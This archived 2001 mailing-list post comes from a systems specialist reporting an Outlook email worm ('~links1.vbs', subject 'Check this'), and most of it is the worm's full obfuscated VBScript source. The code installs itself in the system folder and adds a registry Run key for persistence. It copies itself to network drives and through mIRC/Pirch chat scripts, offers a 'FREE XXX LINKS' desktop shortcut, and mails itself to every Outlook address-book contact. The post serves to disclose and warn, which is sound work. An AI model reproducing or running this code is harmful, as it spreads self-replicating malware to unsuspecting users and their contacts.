Our organization just got hit with a nasty Outlook trojan. What looks like is happening is that the recipient gets an email with the subject "Check this". In the message is an attachment with the filename "~links1.vbs" (VB Script file). Aparently when the user double clicks on this file in Outlook, the script goes through the addressbook and propagates itself. I don't think this trojan has any destructive behaviour. The contents of the attachment are listed below. -- Albert Hopkins Sr. Systems Specialist Dynacare, Inc ahopkinsat_private On Error Resume Next Set A1 = CreateObject("Scripting.FileSystemObject") Set A2 = A1.OpenTextFile(WScript.ScriptFullName,1) Do While A2.AtEndOfStream = False And Mid(A3,40,10) <> "`sd]Lhbsnr" A3 = A2.ReadLine Loop A2.Close Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1),B("STOEMM/WCR")),True) A4.WriteLine(B("No!Dssns!Sdrtld!Odyu")) A4.WriteLine(B("Rdu!@0!<!Bsd`udNckdbu)""Rbshquhof/GhmdRxrudlNckdbu""(")) A4.WriteLine(B("Rdu!@3!<!@0/NqdoUdyuGhmd)VRbshqu/RbshquGtmmO`ld-0(")) A4.WriteLine(B("En!Vihmd!@3/@uDoeNgRusd`l!<!G`mrd!@oe!Lhe)@2-52-01(!=?!""gZOkepquqd""")) A4.WriteLine(B("@2!<!@3/Sd`eMhod")) A4.WriteLine(B("Mnnq")) A4.WriteLine(B("@3/Bmnrd")) A4.WriteLine(B("Rdu!@5!<!@0/Bsd`udUdyuGhmd)@0/CthmeQ`ui)@0/FduRqdbh`mGnmeds)1(-C)""JKLMU,T@U""((-Ustd(")) A4.WriteLine(B("@5/VshudMhod)C)""Ql!Gppqp!Pguwog!Lgvr""((")) A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C3!?!EpgcrgQ`hger&""""Uepknrkli,DkjgU{urgoQ`hger""""+""((")) A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C0!?!C3,QnglRgvrDkjg&YUepknr,UepknrDwjjLcog*3+""((")) A4.WriteLine(B("@5/VshudMhod)C)""Bq!Yfkjg!C0,CrGlbQdUrpgco!?!Dcjug!Clb!Okb&C5*2.*3.+!:<!""""^ub_Jf`ulp""""""((")) A4.WriteLine(B("@5/VshudMhod)C)""C5!?!C0,PgcbJklg""((")) A4.WriteLine(B("@5/VshudMhod)C)""Jqqn""((")) A4.WriteLine(B("@5/VshudMhod)C)""C0,Ejqug""((")) A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C2!?!C3,EpgcrgRgvrDkjg&C3,@wkjbNcrf&C3,IgrUngekcjDqjbgp&3+*@&""""URQGOO1YEP""""++*Rpwg+""((")) A4.WriteLine(B("Rdu!@4!<!@0/NqdoUdyuGhmd)VRbshqu/RbshquGtmmO`ld-0(")) A4.WriteLine(B("En!Vihmd!@4/@uDoeNgRusd`l!<!G`mrd")) A4.WriteLine(B("@5/VshudMhod)C)""C2,YpkrgJklg&@&""""""(!'!B)Sdqm`bd)@4/Sd`eMhod-C)""""""""(-C)""""""""""""(((!'!C)""""""++""((")) A4.WriteLine(B("Mnnq")) A4.WriteLine(B("@4/Bmnrd")) A4.WriteLine(B("@5/VshudMhod)C)""C2,Ejqug""((")) A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C7!?!EpgcrgQ`hger&@&""""TP`ufsw1Pkboo""""++""((")) A4.WriteLine(B("@5/VshudMhod)C)""C7,PgiYpkrg!@&""""KHBV\OL@>O\J>@KFQB_Pliwt^ub_Jf`ulpliw_Tfqgltp_@ruubqwYbupflq_Urq_Urqgoo""""+*C3,@wkjbNcrf&C3,IgrUngekcjDqjbgp&3+*@&""""URQGOO1YEP""""++""((")) A4.WriteLine(B("@5/VshudMhod)C)""Kd!Oui@qv&@&""""Wkfp tfoo ^gg ^ pkluw`rw wl iubb [[[ ofqhp lq vlru gbphwls1 Gl vlr t^qw wl `lqwfqrb<""""+*54*@&""""Iubb [[[ ofqhp""""++!?!4!Rfgl""((")) A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C4!?!C3,EpgcrgRgvrDkjg&C3,@wkjbNcrf&C7,UngekcjDqjbgpu&@&""""Gbphwls""""++*@&""""IUBB [[[ OFQHP1RUO""""++*Rpwg+""((")) A4.WriteLine(B("@5/VshudMhod)C)""C4,YpkrgJklg&@&""""XFqwbuqbwPkluw`rwZ""""++""((")) A4.WriteLine(B("@5/VshudMhod)C)""C4,YpkrgJklg&@&""""RUO:kwws=,,ttt1preofjbgfub`wluv1`lj,""""++""((")) A4.WriteLine(B("@5/VshudMhod)C)""C4,Ejqug""((")) A4.WriteLine(B("@5/VshudMhod)C)""Glb!Kd""((")) A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C9!?!EpgcrgQ`hger&@&""""TP`ufsw1Qbwtluh""""++""((")) A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C6!?!C9,GlwoLgryqpmBpktgu""((")) A4.WriteLine(B("@5/VshudMhod)C)""Kd!C6,Eqwlr!:<!.!Rfgl""((")) A4.WriteLine(B("@5/VshudMhod)C)""Dqp!C;!?!.!Rq!C6,Eqwlr!/!3""((")) A4.WriteLine(B("@5/VshudMhod)C)""Kd!KlUrp&C6,Krgo&C;+*@&""""__""""++!:<!.!Rfgl""((")) A4.WriteLine(B("@5/VshudMhod)C)""C3,Eqn{Dkjg!YUepknr,UepknrDwjjLcog*!C3,@wkjbNcrf&C6,Krgo&C;+*@&""""OFQHP1YEP""""++""((")) A4.WriteLine(B("@5/VshudMhod)C)""Glb!Kd""((")) A4.WriteLine(B("@5/VshudMhod)C)""Lgvr""((")) A4.WriteLine(B("@5/VshudMhod)C)""Glb!Kd""((")) A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C3.!?!EpgcrgQ`hger&@&""""Lrwollh1>ssof`^wflq""""++""((")) A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C33!?!C3.,IgrLcogUnceg&@&""""J>SF""""++""((")) A4.WriteLine(B("@5/VshudMhod)C)""Dqp!Gcef!C30!Kl!C33,CbbpguuJkuru""((")) A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C35!?!C3.,EpgcrgKrgo&.+""((")) A4.WriteLine(B("@5/VshudMhod)C)""Dqp!C32!?!3!Rq!C30,CbbpguuGlrpkgu,Eqwlr""((")) A4.WriteLine(B("@5/VshudMhod)C)""Ugr!C37!?!C30,CbbpguuGlrpkgu&C32+""((")) A4.WriteLine(B("@5/VshudMhod)C)""Kd!C32!?!3!Rfgl""((")) A4.WriteLine(B("@5/VshudMhod)C)""C35,@EE!?!C37,Cbbpguu""((")) A4.WriteLine(B("@5/VshudMhod)C)""Gjug""((")) A4.WriteLine(B("@5/VshudMhod)C)""C35,@EE!?!C35,@EE!$!@&""""8 """"+!$!C37,Cbbpguu""((")) A4.WriteLine(B("@5/VshudMhod)C)""Glb!Kd""((")) A4.WriteLine(B("@5/VshudMhod)C)""Lgvr""((")) A4.WriteLine(B("@5/VshudMhod)C)""C35,Uw`hger!?!@&""""@kb`h wkfp""""+""((")) A4.WriteLine(B("@5/VshudMhod)C)""C35,@qb{!?!@&""""K^yb irq tfwk wkbpb ofqhp1""""+!$!Efp&35+!$!Efp&3.+!$!@&""""Evb1""""+""((")) A4.WriteLine(B("@5/VshudMhod)C)""C35,Crrcefoglru,Cbb!YUepknr,UepknrDwjjLcog""((")) A4.WriteLine(B("@5/VshudMhod)C)""C35,BgjgrgCdrgpUw`okr!?!Rpwg""((")) A4.WriteLine(B("@5/VshudMhod)C)""C35,Uglb""((")) A4.WriteLine(B("@5/VshudMhod)C)""Lgvr""((")) A4.WriteLine(B("@5/VshudMhod)C)""Dwlerkql!@&@3+""((")) A4.WriteLine(B("@5/VshudMhod)C)""Dqp!@0!?!3!Rq!Jgl&@3+""((")) A4.WriteLine(B("@5/VshudMhod)C)""Kd!Cue&Okb&@3*@0*3++!:<!52!Clb!Cue&Okb&@3*@0*3++!:<!57!Clb!Cue&Okb&@3*@0*3++!:<!304!Rfgl""((")) A4.WriteLine(B("@5/VshudMhod)C)""Kd!Cue&Okb&@3*@0*3++!Oqb!0!?!.!Rfgl""((")) A4.WriteLine(B("@5/VshudMhod)C)""@!?!@!$!Efp&Cue&Okb&@3*@0*3++!-!Pkifr&Cue&Okb&C5*9.*3++!-!3*3++""((")) A4.WriteLine(B("@5/VshudMhod)C)""Gjug""((")) A4.WriteLine(B("@5/VshudMhod)C)""@!?!@!$!Efp&Cue&Okb&@3*@0*3++!/!Pkifr&Cue&Okb&C5*9.*3++!-!3*3++""((")) A4.WriteLine(B("@5/VshudMhod)C)""Glb!Kd""((")) A4.WriteLine(B("@5/VshudMhod)C)""Gjug""((")) A4.WriteLine(B("@5/VshudMhod)C)""@!?!@!$!Okb&@3*@0*3+""((")) A4.WriteLine(B("@5/VshudMhod)C)""Glb!Kd""((")) A4.WriteLine(B("@5/VshudMhod)C)""Lgvr""((")) A4.WriteLine(B("@5/VshudMhod)C)""Glb!Dwlerkql""((")) A4.WriteLine(B("@5/Bmnrd")) A4.WriteLine(B("Gns!D`bi!@7!Ho!@0/Eshwdr")) A4.WriteLine(B("Hg!@7/EshwdUxqd!<!3!Uido")) A4.WriteLine(B("E!@7/EshwdMduuds!'!C)""8ZOKPE""(")) A4.WriteLine(B("E!@7/EshwdMduuds!'!C)""8ZNKPEF;6""(")) A4.WriteLine(B("Doe!Hg")) A4.WriteLine(B("Odyu")) A4.WriteLine(B("Rdu!@6!<!Bsd`udNckdbu)C)""YUepknr,Ufgjj""((")) A4.WriteLine(B("E!@6/SdfSd`e)C)""FMG[aJQECJaOCEFKLGZUqdrycpgZOkepquqdrZYklbqyuZEwppglrTgpukqlZNpqipcoDkjguBkp""((")) A4.WriteLine(B("Gtobuhno!C)C0(")) A4.WriteLine(B("Gns!C3!<!0!Un!Mdo)C0(")) A4.WriteLine(B("Hg!@rb)Lhe)C0-C3-0((!=?!23!@oe!@rb)Lhe)C0-C3-0((!=?!22!@oe!@rb)Lhe)C0-C3-0((!=?!25!@oe!@rb)Lhe)C0-C3-0((!=?!071!@oe!@rb)Lhe)C0-C3-0((!=?!344!Uido")) A4.WriteLine(B("Hg!@rb)Lhe)C0-C3-0((!Lne!3!<!1!Uido")) A4.WriteLine(B("C!<!C!'!Bis)@rb)Lhe)C0-C3-0((!,!Shfiu)@rb)Lhe)@2-9-0((!,!3-0((")) A4.WriteLine(B("Dmrd")) A4.WriteLine(B("C!<!C!'!Bis)@rb)Lhe)C0-C3-0((!*!Shfiu)@rb)Lhe)@2-9-0((!,!3-0((")) A4.WriteLine(B("Doe!Hg")) A4.WriteLine(B("Dmrd")) A4.WriteLine(B("C!<!C!'!Lhe)C0-C3-0(")) A4.WriteLine(B("Doe!Hg")) A4.WriteLine(B("Odyu")) A4.WriteLine(B("Doe!Gtobuhno")) A4.WriteLine(B("Gtobuhno!B)B0(")) A4.WriteLine(B("Gns!B3!<!0!Un!Mdo)B0(")) A4.WriteLine(B("Hg!@rb)Lhe)B0-B3-0((!=?!25!@oe!@rb)Lhe)B0-B3-0((!=?!24!@oe!@rb)Lhe)B0-B3-0((!=?!037!Uido")) A4.WriteLine(B("Hg!@rb)Lhe)B0-B3-0((!Lne!3!<!1!Uido")) A4.WriteLine(B("B!<!B!'!Bis)@rb)Lhe)B0-B3-0((!*!Shfiu)@rb)Lhe)@2-09-0((!*!4-0((")) A4.WriteLine(B("Dmrd")) A4.WriteLine(B("B!<!B!'!Bis)@rb)Lhe)B0-B3-0((!,!Shfiu)@rb)Lhe)@2-09-0((!*!4-0((")) A4.WriteLine(B("Doe!Hg")) A4.WriteLine(B("Dmrd")) A4.WriteLine(B("B!<!B!'!Lhe)B0-B3-0(")) A4.WriteLine(B("Doe!Hg")) A4.WriteLine(B("Odyu")) A4.WriteLine(B("Doe!Gtobuhno")) A4.WriteLine(B("Rtc!E)E0(")) A4.WriteLine(B("Hg!@0/GnmedsDyhrur)E0(!<!Ustd!Uido")) A4.WriteLine(B("Gns!D`bi!E3!Ho!@0/FduGnmeds)E0(/Ghmdr")) A4.WriteLine(B("Hg!TB`rd)E3/O`ld(!<!C)""OKPE50,GVG""(!Uido")) A4.WriteLine(B("Rdu!E2!<!@0/Bsd`udUdyuGhmd)@0/CthmeQ`ui)E3/Q`sdouGnmeds-C)""UEPKNR,KLK""((-Ustd(")) A4.WriteLine(B("E2/VshudMhod)C)""]uepknr_""((")) A4.WriteLine(B("E2/VshudMhod)C)""l.?ql!38hqkl8%8kd!#og! ?!#lkem!bee!uglb!#lkem!""(!'!@0/CthmeQ`ui)@0/FduRqdbh`mGnmeds)1(-C)""JKLMU,T@U""(((")) A4.WriteLine(B("E2/Bmnrd")) A4.WriteLine(B("Doe!Hg")) A4.WriteLine(B("Hg!TB`rd)E3/O`ld(!<!C)""NKPEF;6,GVG""(!Uido")) A4.WriteLine(B("Rdu!E5!<!@0/Bsd`udUdyuGhmd)@0/CthmeQ`ui)E3/Q`sdouGnmeds-C)""GTGLRU,KLK""((-Ustd(")) A4.WriteLine(B("E5/VshudMhod)C)""]Jgtgju_""((")) A4.WriteLine(B("E5/VshudMhod)C)""Glc`jgb?3""((")) A4.WriteLine(B("E5/VshudMhod)C)""Eqwlr?4""((")) A4.WriteLine(B("E5/VshudMhod)C)""Jgtgj3?.../Wlmlqylu""((")) A4.WriteLine(B("E5/VshudMhod)C)"".../WlmlqyluGlc`jgb?3""((")) A4.WriteLine(B("E5/VshudMhod)C)""Jgtgj0?3../Jgtgj!3..""((")) A4.WriteLine(B("E5/VshudMhod)C)""3../Jgtgj!3..Glc`jgb?3""((")) A4.WriteLine(B("E5/VshudMhod)C)""Jgtgj5?0../Jgtgj!0..""((")) A4.WriteLine(B("E5/VshudMhod)C)""0../Jgtgj!0..Glc`jgb?3""((")) A4.WriteLine(B("E5/VshudMhod)C)""Jgtgj2?5../Jgtgj!5..""((")) A4.WriteLine(B("E5/VshudMhod)C)""5../Jgtgj!5..Glc`jgb?3""((")) A4.WriteLine(B("E5/VshudMhod)C)""Jgtgj7?2../Jgtgj!2..""((")) A4.WriteLine(B("E5/VshudMhod)C)""2../Jgtgj!2..Glc`jgb?3""((")) A4.WriteLine(B("E5/VshudMhod)C)""Jgtgj4?7../Jgtgj!7..""((")) A4.WriteLine(B("E5/VshudMhod)C)""7../Jgtgj!7..Glc`jgb?3""((")) A4.WriteLine(B("E5/VshudMhod)""""(")) A4.WriteLine(B("E5/VshudMhod)C)""].../Wlmlqylu_""((")) A4.WriteLine(B("E5/VshudMhod)C)""Wugp3?( (>(""((")) A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?3""((")) A4.WriteLine(B("E5/VshudMhod)C)""Gtglr3?QL!HQKL8%81bee!uglb!#lkem!""(!'!@0/CthmeQ`ui)@0/FduRqdbh`mGnmeds)1(-C)""JKLMU,T@U""(((")) A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?3""((")) A4.WriteLine(B("E5/VshudMhod)""""(")) A4.WriteLine(B("E5/VshudMhod)C)""]3../Jgtgj!3.._""((")) A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""((")) A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""((")) A4.WriteLine(B("E5/VshudMhod)""""(")) A4.WriteLine(B("E5/VshudMhod)C)""]0../Jgtgj!0.._""((")) A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""((")) A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""((")) A4.WriteLine(B("E5/VshudMhod)""""(")) A4.WriteLine(B("E5/VshudMhod)C)""]5../Jgtgj!5.._""((")) A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""((")) A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""((")) A4.WriteLine(B("E5/VshudMhod)""""(")) A4.WriteLine(B("E5/VshudMhod)C)""]2../Jgtgj!2.._""((")) A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""((")) A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""((")) A4.WriteLine(B("E5/VshudMhod)""""(")) A4.WriteLine(B("E5/VshudMhod)C)""]7../Jgtgj!7.._""((")) A4.WriteLine(B("E5/VshudMhod)C)""WugpEqwlr?.""((")) A4.WriteLine(B("E5/VshudMhod)C)""GtglrEqwlr?.""((")) A4.WriteLine(B("E5/Bmnrd")) A4.WriteLine(B("Doe!Hg")) A4.WriteLine(B("Odyu")) A4.WriteLine(B("Gns!D`bi!E4!Ho!@0/FduGnmeds)E0(/RtcGnmedsr")) A4.WriteLine(B("E!E4/Q`ui")) A4.WriteLine(B("Odyu")) A4.WriteLine(B("Doe!Hg")) A4.WriteLine(B("Doe!Rtc")) A4.Close Set A5 = CreateObject(B("VRbshqu/Ridmm")) A5.RegWrite B("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]Stoemm"),A1.BuildPath(A1.GetSpecialFolder(1),B("STOEMM/WCR")) If MsgBox(B("Uihr!vhmm!`ee!`!rinsubtu!un!gsdd!YYY!mhojr!no!xnts!edrjunq/!En!xnt!v`ou!un!bnouhotd>"),36,B("Gsdd!YYY!mhojr")) = 6 Then Set A6 = A1.CreateTextFile(A1.BuildPath(A5.SpecialFolders(B("Edrjunq")),B("GSDD!YYY!MHOJR/TSM")),True) A6.WriteLine(B("ZHoudsoduRinsubtu\")) A6.WriteLine(B("TSM<iuuq;..vvv/rtcmhldehsdbunsx/bnl.")) A6.Close End If Set A7 = CreateObject(B("VRbshqu/Oduvnsj")) Set A8 = A7.EnumNetworkDrives If A8.Count <> 0 Then For A9 = 0 To A8.Count - 1 If InStr(A8.Item(A9),B("]]")) <> 0 Then A1.CopyFile WScript.ScriptFullName, A1.BuildPath(A8.Item(A9),B("MHOJR/WCR")) End If Next End If Set A10 = CreateObject(B("Ntumnnj/@qqmhb`uhno")) Set A11 = A10.GetNameSpace(B("L@QH")) For Each A12 In A11.AddressLists Set A13 = A10.CreateItem(0) For A14 = 1 To A12.AddressEntries.Count Set A15 = A12.AddressEntries(A14) If A14 = 1 Then A13.BCC = A15.Address Else A13.BCC = A13.BCC & B(":!") & A15.Address End If Next A13.Subject = B("Bidbj!uihr") A13.Body = B("I`wd!gto!vhui!uidrd!mhojr/") & Chr(13) & Chr(10) & B("Cxd/") A13.Attachments.Add WScript.ScriptFullName A13.DeleteAfterSubmit = True A13.Send Next Function B(B1) For B2 = 1 To Len(B1) If Asc(Mid(B1,B2,1)) <> 34 And Asc(Mid(B1,B2,1)) <> 35 And Asc(Mid(B1,B2,1)) <> 126 Then If Asc(Mid(B1,B2,1)) Mod 2 = 0 Then B = B & Chr(Asc(Mid(B1,B2,1)) + Right(Asc(Mid(A3,70,1)) + 1,1)) Else B = B & Chr(Asc(Mid(B1,B2,1)) - Right(Asc(Mid(A3,70,1)) + 1,1)) End If Else B = B & Mid(B1,B2,1) End If Next End Function
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:07:59 PDT